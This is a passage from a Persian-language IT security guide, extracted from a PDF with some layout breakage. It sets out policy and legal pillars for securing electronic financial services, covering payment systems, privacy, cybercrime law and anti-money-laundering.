‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻫﺸﺖ ﺭﻛـﻦ ﻣﻬـﻢ ﺗﻮﺟـﻪ‬
‫ﺩﺍﺷﺖ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﻣﻨﺎﺳﺐ؛‬
‫ﺗﻤﻬﻴــﺪﺍﺕ ﻓﻨــﻲ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛‬
‫ﻧﻈﺎﺭﺕ ﻗﻮﻱ ﻭ ﭘﻴﺸﮕﻴﺮﻱ؛ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻬﺘـﺮ‬
‫ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻭ ﻻﻳـﻪﺑﻨـﺪﻱﺷـﺪﺓ‬
‫ﻣــﺪﻳﺮﻳﺖ ﺧﻄــﺮ؛ ﺍﺯ ﺟﻤﻠــﻪ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﺮﺍﻱ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ؛‬
‫ﻲ ﺑﻴﻤـﻪ ﺑﺘﻮﺍﻧﻨـﺪ‬
‫ﭼﺎﺭﭼﻮﺑﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻ ﹺ‬
‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻴﻤﻪ ﻛﻨﻨﺪ ﻭ ﺩﺭ‬
‫ﻛﻨﺎﺭ ﺁﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻳﻦ ﺣﻮﺯﻩ ﺭﺍ ﺑـﺎ ﺍﻳﺠـﺎﺩ ﺗﻌﻬـﺪﺍﺕ‬
‫ﻣﺎﻟﻲ ﺑﺎﺯﭘﺮﺩﺍﺧﺘﻬﺎ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ؛‬
‫ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ؛‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ؛‬
‫ﺁﻣﻮﺯﺵ ﺷﻬﺮﻭﻧﺪﺍﻥ‪ ،‬ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻭ ﻣﺪﻳﺮﻳﺖ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ؛ ﻭ‬
‫ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳﻪﺑﻨﺪﻱ ﺷﺪﻩ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻣﺎﻟﻜﻴﺖ ﺻﻨﺎﻳﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﺎﻋﺚ ﻃـﺮﺡ ﺳـﺆﺍﻻﺕ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺩﺭﺑـﺎﺭﺓ ﺳﻴﺎﺳـﺖ ﺭﻗـﺎﺑﺘﻲ ﻭ‬
‫ﻛﺸﻤﻜﺸﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛـﺴﺐ ﻣﻨـﺎﻓﻊ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺳﻴﺎﺳــﺖ ﺭﻗــﺎﺑﺘﻲ ﻣــﻲﺗــﻮﺍﻥ ﭘﺮﺳــﻴﺪ‪ :‬ﺁﻳــﺎ ﻧﻘــﺸﻬﺎﻱ ﭼﻨﺪﮔﺎﻧــﺔ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﻗﺎﺑـﺖ ﺑـﻮﻳﮋﻩ ﺩﺭ‬
‫ﻻ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ‪،‬‬
‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ‪ -‬ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺩ ﺩﺍﺭﻧﺪ ‪ -‬ﻣﻨﺠﺮ ﺷﻮﺩ؟ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺷـﺮﻛﺖ ﺩﺭﺑـﺎﺭﺓ‬
‫ﮔــﺰﺍﺭﺵ ﺩﻗﻴــﻖ ﻭ ﻓــﻮﺭﻱ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﭼﮕﻮﻧــﻪ ﺗــﻀﻤﻴﻦ‬
‫ﻣﻲﺷﻮﺩ؟ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﺭﻭﻧﺪ ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣـﻮﺭ ﺑـﻪ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﺛﺎﻟﺚ‪ ،‬ﺍﻫﻤﻴﺖ ﺍﺻﻼﺡ ﺣﻮﺯﺓ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﺭﺃﺱ ﻫﺮﻡ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺩﺭ ﺻﻨﻌﺘﻲ ﺑـﺎ ﭼﻨـﻴﻦ ﻣﺠﻤﻮﻋـﺔ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺭﺍ‬
‫ﻻ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﻴﺎﻥ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﻭ‬
‫ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺯ ﻗـﺴﻤﺘﻲ ﺍﺯ ﻫﺰﻳﻨـﺔ ﻗـﺮﺍﺭﺩﺍﺩ‬
‫ﺧﺪﻣﺎﺕ ﺑﻌﻨﻮﺍﻥ ﺿﻤﺎﻧﺖ ﻛﺎﺭﺁﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺣﺘـﻲ ﺑـﺎ‬
‫ﻲ ﻓﻌﺎﻟﻴـﺖ‬
‫ﺍﻳﻦ ﻭﺟﻮﺩ ﻫﻢ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ ﻛـﺎﺭﺁﻳ ﹺ‬
‫ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟـﻪ ﺧﺎﺻـﻲ ﺑـﻪ ﺍﻳـﻦ ﺗـﻮﺍﺯﻥ‬
‫ﺩﺍﺷﺖ‪.‬‬
‫‪١٣٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺭﻛﻦ ﺍﻭﻝ‪:‬‬
‫ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ‬
‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ‬
‫ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻣﺜـﻞ ﺗﻮﺯﻳـﻊ ﻭ ﺩﺍﺩ ﻭ ﺳـﺘﺪ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ( ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺗﻮﺳـﻌﺔ ﻗـﻮﺍﻧﻴﻦ‪ ،‬ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺷـﻬﺎ‪ ،‬ﺑﺎﻳـﺪ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ‪.‬‬
‫ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗـﺄﻣﻴﻦ‬
‫ﻛﻨﻨﺪ ﻭ ﻗﻮﺍﻧﻴﻦ ﺟﻨﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺩﺭ ﺑﺮ ﮔـﺮﻓﺘﻦ ﺍﻳـﻦ ﻧـﻮﻉ ﺟـﺮﺍﺋﻢ‬
‫ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﻭ ﭼـﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺑـﺮﺍﻱ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺗﻮﺟﻪ ﺩﺍﺷﺖ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ؛‬
‫ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ؛‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ؛ ﻭ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﺍﺟﺮﺍﻳﻲ‪.‬‬
‫ﺍﻳﻦ ﺷﺶ ﺣﻮﺯﺓ ﺳﻴﺎﺳﺖ‪ ،‬ﻗﺎﻧﻮﻥ ﻭ ﺍﺟﺮﺍ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺑﺎﻳﺪ ﺭﻭﺍﺑـﻂ‬
‫ﺍﺑﺘﺪﺍﻳﻲ ﻣﻴﺎﻥ ﺗﻤـﺎﻣﻲ ﺫﻳﻨﻔﻌـﺎﻥ ﻭ ﺳـﭙﺲ ﺗﺮﺍﻛﻨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺟﺮﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﻳﻜﻲ‬
‫ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺟﺰﺍﻱ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ‬
‫ﻣــﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷﻨﺎﺳــﺎﻳﻲ ﺍﻋﺘﺒــﺎﺭ ﻗــﺎﻧﻮﻧﻲ ﺍﻣــﻀﺎﻫﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺗﺮﺍﻛﻨﺸﻬﺎ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻣﻲﺑﺎﺷـﺪ‪.‬‬
‫ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﺎﻳﺪ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺭﺍ ﺗـﺮﺟﻴﺢ ﺩﻫـﺪ‪ ،‬ﺑـﺮﺍﻱ‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﻔﺎﻇﺖ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩ‪،‬‬
‫ﻭ ﻗﺎﺑﻠﻴﺖ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺧﻠﻲ ﺭﺍ ﺍﺭﺗﻘﺎ ﺑﺨﺸﺪ‪.‬‬
‫ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻗﺎﻧﻮﻥ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﻋﻨﻮﺍﻥ ﻛﻨﺪ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ ﻳـﻚ‬
‫ﺍﻣﻀﺎ‪ ،‬ﺳﺎﺑﻘﻪ ﻳﺎ ﺗﺮﺍﻛﻨﺶ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻴﺴﺖ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺍﻋﺘﺒـﺎﺭ‬
‫ﻗﺎﻧﻮﻧﻲ ﻫﺮ ﻋﻨﺼﺮ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ‬
‫ﺗﻌﺮﻳﻒ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﺴﻴﺎﺭ ﺩﻗﻴﻖ ﺑﺎﺷﻨﺪ‪ .‬ﺗﻌﺎﺭﻳﻒ ﺗـﺎ‬
‫ﺣﺪ ﺍﻣﻜﺎﻥ ﺑﺎﻳﺪ ﺧﺼﻮﺻﻴﺎﺕ ﻓﻨﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺭﺍﻩﺣﻠﻬـﺎﻱ‬
‫ﻣﺨﺘﻠﻒ ﺑﺘﻮﺍﻧﻨﺪ ﻭﺍﺭﺩ ﺑﺎﺯﺍﺭ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ‬
‫ﺩﺭ ﺗﻬﻴﺔ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺑﺎﻳـﺪ ﺗﻤـﺎﻡ‬
‫ﺍﺟﺰﺍﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﺪ ﻧﻈـﺮ‬
‫ﻗﺮﺍﺭ ﺩﺍﺩ‪ .‬ﻫﻤﺔ ﺍﻳﻦ ﺍﺟﺰﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻛﺎﺭ ﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎ ﺣﻔﺎﻇﺖ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ‬
‫ﻭﺟﻮﺩ ﺳﻴﺎﺳﺖ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺩﺭ ﺗﻤﺎﻣﻲ ﺧـﺴﺎﺭﺍﺕ‬
‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺣﻤﻼﺕ ﻭ ﺿﺎﻳﻌﺎﺕ ﺑﺘﻮﺍﻥ ﮔﺰﺍﺭﺷﺎﺕ ﺩﻗﻴﻖ ﻭ‬
‫ﺍﺭﺯﺷﻤﻨﺪﻱ ﺗﻬﻴﻪ ﻛﺮﺩ‪ .‬ﺻﺮﻑ ﻭﺟـﻮﺩ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻻ ﻣﺆﺳـﺴﺔ ﻣـﺎﻟﻲ ﻭ ﺍﺩﺍﺭﻩﻛﻨﻨـﺪﮔﺎﻥ ﺁﻥ ﺩﺭ‬
‫ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﺗﺪﺍﺑﻴﺮ ﻻﺯﻡ ﺭﺍ ﺍﻧﺪﻳﺸﻴﺪﻩﺍﻧﺪ‪.‬‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﻗﺎﻧﻮﻥ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﻭ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺣﻔﺎﻇـﺖ‬
‫ﺍﺯ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﻭ ﺳﺎﻳﺮ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺗﺠﺎﺭﻱ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴـﺮﺩ‬
‫ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺍﻋـﻼﻡ‬
‫ﻛﻨﺪ‪ .‬ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎﻳﻲ ﻫﻤﭽﻨﺎﻥ ﺩﺭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬
‫ﺷﻬﺮﻭﻧﺪﺍﻧﺶ ﻃﺒﻖ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ )ﻣـﺼﻮﺏ ﺳـﺎﻝ‬
‫‪ (۱۹۹۵‬ﭘﻴﺸﺘﺎﺯ ﺍﺳﺖ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ‪ ،‬ﻗﺎﻧﻮﻥ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬
‫ﺑﺎﻳﺪ ﺍﺻﻮﻝ ﺍﺳﺘﻔﺎﺩﺓ ﻋﺎﺩﻻﻧﻪ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ )ﺷـﺎﻣﻞ ﺗﻮﺟـﻪ‪ ،‬ﺍﻧﺘﺨـﺎﺏ‪،‬‬
‫ﺩﺳﺘﺮﺳﻲ ﻭ ﺣﺪﺍﻗﻞ ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﻜﻤﻴﻞ ﻣﻌﺎﻣﻠﻪ( ﺭﺍ ﺷﺎﻣﻞ ﺷﻮﺩ‪.‬‬
‫ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ‬
‫‪٣١‬‬
‫ﻫﺮ ﻛﺸﻮﺭ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻨﺠﺮ‬
‫ﺑﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺟـﺪﻱ ﺑـﻪ ﺧـﻮﺩ ﺷـﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧـﻪ ﻭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺁﺳﻴﺒﻬﺎﻱ ﺩﻳﮕﺮ ﻣﻲﺷﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻗـﺎﻧﻮﻥ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺍﺑﺰﺍﺭ ﻭ ﻣﻨﺎﺑﻊ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﭘﻴﮕـﺮﺩ ﻭ ﻧﻴـﺰ‬
‫ﻣﺠﺎﺯﺍﺕ ﻣﺮﺗﻜﺒﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺑﺎﺷـﺪ‪ .‬ﻧﻤﻮﻧـﻪﺍﻱ‬
‫ﺍﺯ ﭼﻨﻴﻦ ﻗﻮﺍﻧﻴﻦ ﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻌﺎﻫﺪﺓ ﺟﺮﺍﺋﻢ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺭﻭﭘﺎ‪ ٣٢‬ﭘﻴﺪﺍ ﻛﺮﺩ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﭼﻬـﺎﺭﻡ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺩﺭ‬
‫‪٣٣‬‬
‫ﻣﻮﺭﺩ ﺁﻥ ﺑﺤﺚ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﺭﺍ ﺗﻌﺮﻳﻒ ﻛﻨﻨﺪ‬
‫ﻭ ﺟﻮﺍﻣــﻊ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﺭﺍ ﺑــﻪ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ ﺑﺎﺯﺭﺳــﻲ‪ ،‬ﭘﻴﮕــﺮﺩ ﻭ‬
‫‪Cyber Crime‬‬
‫‪Europe’s Convention on Cyber Crime‬‬
‫‪۳۳‬‬
‫ﺍﻧﺠﻤﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ‪:‬‬
‫‪http://conventions.coe.int‬‬
‫‪31‬‬
‫‪32‬‬
‫‪١٣١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﺠﺎﺯﺍﺕ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ ﺗﺎ ﺧﻄﺮ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ‬
‫ﺍﺯ ﺟﺎﻧﺐ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﻛﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ‬
‫ﻛﺮﺩﻩ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﺟﺮﻳــﺎﻥ ﺩﺍﺭﺩ ﺗــﺄﺛﻴﺮ ﺑــﺴﺰﺍﻳﻲ ﺑــﺮ ﺳﻴــﺴﺘﻢ ﭘﺮﺩﺍﺧــﺖ ﺟﻬــﺎﻧﻲ‪،‬‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﭘﻮﻟﻲ‪ ،‬ﻭ ﭘﻴﺶﺑﻴﻨﻴﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ‬
‫ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ‬
‫ﺷﺎﻳﺪ ﺑﺘﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺩﺭ ﻣﺮﺯﻫﺎﻱ ﻳﻚ ﻛﺸﻮﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻭﺟﻮﺩ ﭼﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺁﻥ ﺍﺯ‬
‫ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﻣﺒﺪﺃ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ‪،‬‬
